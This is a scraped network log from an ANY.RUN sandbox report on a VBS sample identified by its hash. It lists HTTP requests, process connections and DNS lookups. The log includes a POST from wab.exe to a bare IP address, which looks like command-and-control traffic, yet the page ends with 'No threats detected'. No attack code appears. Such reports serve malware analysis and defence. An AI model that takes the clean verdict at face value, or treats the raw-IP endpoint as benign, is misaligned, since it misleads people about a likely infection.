http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA177el9ggmWelJjG4vdGL0%3D
unknown
unknown
6312
wab.exe
GET
200
172.217.18.3:80
http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D
unknown
unknown
6312
wab.exe
GET
200
172.217.18.3:80
http://ocsp.pki.goog/gts1c3/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEQD0UtXnCnpZpQnm0pVR6c%2BA
unknown
unknown
6312
wab.exe
GET
200
172.217.18.3:80
http://ocsp.pki.goog/gtsr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBQwkcLWD4LqGJ7bE7B1XZsEbmfwUAQU5K8rJnEaK0gnhS9SZizv8IkTcT4CDQIDvFNZazTHGPUBUGY%3D
unknown
unknown
6312
wab.exe
GET
200
172.217.18.3:80
http://ocsp.pki.goog/gts1c3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEAuKlu2IIRHoCpyGh12tkbo%3D
unknown
unknown
6312
wab.exe
POST
140.82.61.49:80
http://140.82.61.49/index.php/927339792
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4828
svchost.exe
239.255.255.250:1900
unknown
3996
svchost.exe
20.190.159.0:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
1280
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6592
svchost.exe
142.250.181.238:443
drive.google.com
GOOGLE
US
whitelisted
6592
svchost.exe
142.250.185.97:443
drive.usercontent.google.com
GOOGLE
US
whitelisted
3996
svchost.exe
20.190.159.4:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3996
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
3996
svchost.exe
20.190.159.68:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
2872
SIHClient.exe
20.114.59.183:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
2872
SIHClient.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
unknown

DNS requests

Domain
IP
Reputation
drive.google.com
  • 142.250.181.238
shared
drive.usercontent.google.com
  • 142.250.185.97
unknown
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 20.190.159.68
  • 20.190.159.0
  • 40.126.31.69
  • 20.190.159.23
  • 20.190.159.4
  • 20.190.159.64
  • 40.126.31.67
  • 40.126.31.71
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.104.136.2
whitelisted
slscr.update.microsoft.com
  • 20.114.59.183
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
arc.msn.com
  • 20.223.35.26
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
b84523feed02df1762ce3858529fe40234bbd9d023d105466e92c6bd0d20bc87.vbs